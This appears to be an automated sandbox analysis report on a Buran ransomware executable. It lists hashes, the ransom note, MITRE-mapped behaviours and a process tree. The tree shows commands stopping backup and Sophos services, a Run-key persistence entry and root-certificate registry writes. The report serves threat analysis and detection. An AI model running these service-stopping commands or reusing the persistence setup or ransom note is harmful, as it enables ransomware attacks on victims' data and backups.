buran | 13f476ec8dba856b93c2b799dbf9994191d14e9dbc2c6d75c9ec3d8054144b3f

Analysis

max time kernel
151s
max time network
142s
platform
windows7_x64
resource
win7-20220414-en
submitted
03-06-2022 02:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

36c3-malwarexchg-part3/1.exe
Size

477KB
MD5

a1b5dc4fd2cd2b54498faf42fe9b5e50
SHA1

46edeab30fe0696422edad230116c51d5b145aa3
SHA256

533e14cb3a1434f68321fb9fd2a2e66d0a12ce16f792ee47e77edf8eb2aeac21
SHA512

6316f72a06960def5f9f086b4a258adf8dad7396524597fa23f2b781b87418b1009b5b8f7a67e90406739e2bdf3db873254ace84b64c6b569bda8c0435821848

Score

10^/10

buran evasion persistence ransomware

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note

!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: [email protected] Reserved email: [email protected] Your personal ID: 10D-252-DE7 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Emails

[email protected]

Signatures

Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
ransomware buran

Clears Windows event logs 1 TTPs 3 IoCs

evasion ransomware

Indicator Removal on Host

T1070

pid	Process
800	wevtutil.exe
576	wevtutil.exe
1564	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Executes dropped EXE 2 IoCs

pid	Process
524	WmiPrvSE.exe
812	WmiPrvSE.exe

Deletes itself 1 IoCs

pid	Process
1112	notepad.exe

Loads dropped DLL 2 IoCs

pid	Process
872	1.exe
872	1.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run	1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\WmiPrvSE.exe\" -start"	1.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\X:	WmiPrvSE.exe
File opened (read-only)	\??\W:	WmiPrvSE.exe
File opened (read-only)	\??\P:	WmiPrvSE.exe
File opened (read-only)	\??\I:	WmiPrvSE.exe
File opened (read-only)	\??\A:	WmiPrvSE.exe
File opened (read-only)	\??\U:	WmiPrvSE.exe
File opened (read-only)	\??\R:	WmiPrvSE.exe
File opened (read-only)	\??\H:	WmiPrvSE.exe
File opened (read-only)	\??\F:	WmiPrvSE.exe
File opened (read-only)	\??\E:	WmiPrvSE.exe
File opened (read-only)	\??\Y:	WmiPrvSE.exe
File opened (read-only)	\??\V:	WmiPrvSE.exe
File opened (read-only)	\??\Q:	WmiPrvSE.exe
File opened (read-only)	\??\L:	WmiPrvSE.exe
File opened (read-only)	\??\J:	WmiPrvSE.exe
File opened (read-only)	\??\Z:	WmiPrvSE.exe
File opened (read-only)	\??\T:	WmiPrvSE.exe
File opened (read-only)	\??\S:	WmiPrvSE.exe
File opened (read-only)	\??\O:	WmiPrvSE.exe
File opened (read-only)	\??\N:	WmiPrvSE.exe
File opened (read-only)	\??\M:	WmiPrvSE.exe
File opened (read-only)	\??\K:	WmiPrvSE.exe
File opened (read-only)	\??\G:	WmiPrvSE.exe
File opened (read-only)	\??\B:	WmiPrvSE.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	geoiptool.com

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\7-Zip\7z.exe	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Africa\Johannesburg.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00172_.GIF.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSTORE_K_COL.HXK	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\rt.jar.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Marengo	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_zh_4.4.0.v20140623020002.jar.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml	WmiPrvSE.exe
File created	C:\Program Files\Java\jre7\lib\images\cursors\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Guatemala	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14677_.GIF	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterBold.ttf.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00092_.WMF	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107282.WMF.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0281904.WMF	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_zh_CN.jar.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14583_.GIF.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Madrid.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Jayapura	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00441_.WMF	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CARBN_01.MID.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01152_.WMF	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21295_.GIF.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\ParentMenuButtonIcon.png	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chuuk.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00544_.WMF	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090149.WMF.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Equity.eftx	WmiPrvSE.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	WmiPrvSE.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0150150.WMF.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152878.WMF	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0252629.WMF	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00468_.WMF	WmiPrvSE.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-cn.txt.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Qyzylorda.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00392_.WMF.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00413_.WMF	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0217302.WMF	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0281638.WMF.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02048_.WMF.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0233992.WMF	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Oriel.xml	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18222_.WMF.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT.HXS	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Australia\Perth	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_09.MID	WmiPrvSE.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Austin.thmx.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd.10D-252-DE7	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar	WmiPrvSE.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Africa\Lagos	WmiPrvSE.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1836	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
896	vssadmin.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	1.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
872	1.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeDebugPrivilege	872	1.exe
Token: SeDebugPrivilege	872	1.exe
Token: SeDebugPrivilege	524	WmiPrvSE.exe
Token: SeBackupPrivilege	1600	vssvc.exe
Token: SeRestorePrivilege	1600	vssvc.exe
Token: SeAuditPrivilege	1600	vssvc.exe
Token: SeSecurityPrivilege	800	wevtutil.exe
Token: SeBackupPrivilege	800	wevtutil.exe
Token: SeSecurityPrivilege	576	wevtutil.exe
Token: SeBackupPrivilege	576	wevtutil.exe
Token: SeSecurityPrivilege	1564	wevtutil.exe
Token: SeBackupPrivilege	1564	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 872 wrote to memory of 524	872	1.exe	30
PID 872 wrote to memory of 524	872	1.exe	30
PID 872 wrote to memory of 524	872	1.exe	30
PID 872 wrote to memory of 524	872	1.exe	30
PID 872 wrote to memory of 1112	872	1.exe	31
PID 872 wrote to memory of 1112	872	1.exe	31
PID 872 wrote to memory of 1112	872	1.exe	31
PID 872 wrote to memory of 1112	872	1.exe	31
PID 872 wrote to memory of 1112	872	1.exe	31
PID 872 wrote to memory of 1112	872	1.exe	31
PID 872 wrote to memory of 1112	872	1.exe	31
PID 524 wrote to memory of 812	524	WmiPrvSE.exe	33
PID 524 wrote to memory of 812	524	WmiPrvSE.exe	33
PID 524 wrote to memory of 812	524	WmiPrvSE.exe	33
PID 524 wrote to memory of 812	524	WmiPrvSE.exe	33
PID 524 wrote to memory of 1376	524	WmiPrvSE.exe	34
PID 524 wrote to memory of 1376	524	WmiPrvSE.exe	34
PID 524 wrote to memory of 1376	524	WmiPrvSE.exe	34
PID 524 wrote to memory of 1376	524	WmiPrvSE.exe	34
PID 1376 wrote to memory of 1164	1376	cmd.exe	36
PID 1376 wrote to memory of 1164	1376	cmd.exe	36
PID 1376 wrote to memory of 1164	1376	cmd.exe	36
PID 1376 wrote to memory of 1164	1376	cmd.exe	36
PID 1164 wrote to memory of 1436	1164	net.exe	37
PID 1164 wrote to memory of 1436	1164	net.exe	37
PID 1164 wrote to memory of 1436	1164	net.exe	37
PID 1164 wrote to memory of 1436	1164	net.exe	37
PID 524 wrote to memory of 1908	524	WmiPrvSE.exe	38
PID 524 wrote to memory of 1908	524	WmiPrvSE.exe	38
PID 524 wrote to memory of 1908	524	WmiPrvSE.exe	38
PID 524 wrote to memory of 1908	524	WmiPrvSE.exe	38
PID 1908 wrote to memory of 576	1908	cmd.exe	40
PID 1908 wrote to memory of 576	1908	cmd.exe	40
PID 1908 wrote to memory of 576	1908	cmd.exe	40
PID 1908 wrote to memory of 576	1908	cmd.exe	40
PID 576 wrote to memory of 1932	576	net.exe	41
PID 576 wrote to memory of 1932	576	net.exe	41
PID 576 wrote to memory of 1932	576	net.exe	41
PID 576 wrote to memory of 1932	576	net.exe	41
PID 524 wrote to memory of 360	524	WmiPrvSE.exe	42
PID 524 wrote to memory of 360	524	WmiPrvSE.exe	42
PID 524 wrote to memory of 360	524	WmiPrvSE.exe	42
PID 524 wrote to memory of 360	524	WmiPrvSE.exe	42
PID 360 wrote to memory of 1584	360	cmd.exe	44
PID 360 wrote to memory of 1584	360	cmd.exe	44
PID 360 wrote to memory of 1584	360	cmd.exe	44
PID 360 wrote to memory of 1584	360	cmd.exe	44
PID 1584 wrote to memory of 1612	1584	net.exe	45
PID 1584 wrote to memory of 1612	1584	net.exe	45
PID 1584 wrote to memory of 1612	1584	net.exe	45
PID 1584 wrote to memory of 1612	1584	net.exe	45
PID 524 wrote to memory of 1608	524	WmiPrvSE.exe	46
PID 524 wrote to memory of 1608	524	WmiPrvSE.exe	46
PID 524 wrote to memory of 1608	524	WmiPrvSE.exe	46
PID 524 wrote to memory of 1608	524	WmiPrvSE.exe	46
PID 1608 wrote to memory of 560	1608	cmd.exe	48
PID 1608 wrote to memory of 560	1608	cmd.exe	48
PID 1608 wrote to memory of 560	1608	cmd.exe	48
PID 1608 wrote to memory of 560	1608	cmd.exe	48
PID 560 wrote to memory of 472	560	net.exe	49
PID 560 wrote to memory of 472	560	net.exe	49
PID 560 wrote to memory of 472	560	net.exe	49
PID 560 wrote to memory of 472	560	net.exe	49
PID 524 wrote to memory of 564	524	WmiPrvSE.exe	50

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1196	attrib.exe

C:\Users\Admin\AppData\Local\Temp\36c3-malwarexchg-part3\1.exe
"C:\Users\Admin\AppData\Local\Temp\36c3-malwarexchg-part3\1.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:872
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\WmiPrvSE.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\WmiPrvSE.exe" -start
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:524
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\WmiPrvSE.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\WmiPrvSE.exe" -agent 0
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:812
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "Acronis VSS Provider" /y
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1376
  - - C:\Windows\SysWOW64\net.exe
      net stop "Acronis VSS Provider" /y
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1164
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
        5⤵
        
        PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "Enterprise Client Service" /y
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1908
  - - C:\Windows\SysWOW64\net.exe
      net stop "Enterprise Client Service" /y
      4⤵
      Suspicious use of WriteProcessMemory
      PID:576
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Enterprise Client Service" /y
        5⤵
        
        PID:1932
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "SQL Backups" /y
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:360
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQL Backups" /y
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1584
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQL Backups" /y
        5⤵
        
        PID:1612
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "SQLsafe Backup Service" /y
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1608
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLsafe Backup Service" /y
      4⤵
      Suspicious use of WriteProcessMemory
      PID:560
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
        5⤵
        
        PID:472
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "SQLsafe Filter Service" /y
    3⤵
    PID:564
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLsafe Filter Service" /y
      4⤵
      PID:1184
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
        5⤵
        
        PID:1008
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "Sophos Agent" /y
    3⤵
    PID:592
  - - C:\Windows\SysWOW64\net.exe
      net stop "Sophos Agent" /y
      4⤵
      PID:768
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Agent" /y
        5⤵
        
        PID:1672
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "Sophos AutoUpdate Service" /y
    3⤵
    PID:616
  - - C:\Windows\SysWOW64\net.exe
      net stop "Sophos AutoUpdate Service" /y
      4⤵
      PID:1464
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y
        5⤵
        
        PID:1896
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "Sophos Clean Service" /y
    3⤵
    PID:1744
  - - C:\Windows\SysWOW64\net.exe
      net stop "Sophos Clean Service" /y
      4⤵
      PID:432
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Clean Service" /y
        5⤵
        
        PID:1988
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C net stop "Sophos Device Control Service" /y
    3⤵
    PID:584
  - - C:\Windows\SysWOW64\net.exe
      net stop "Sophos Device Control Service" /y
      4⤵
      PID:1768
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Device Control Service" /y
        5⤵
        
        PID:896
- - C:\Windows\SysWOW64\cmd.exe
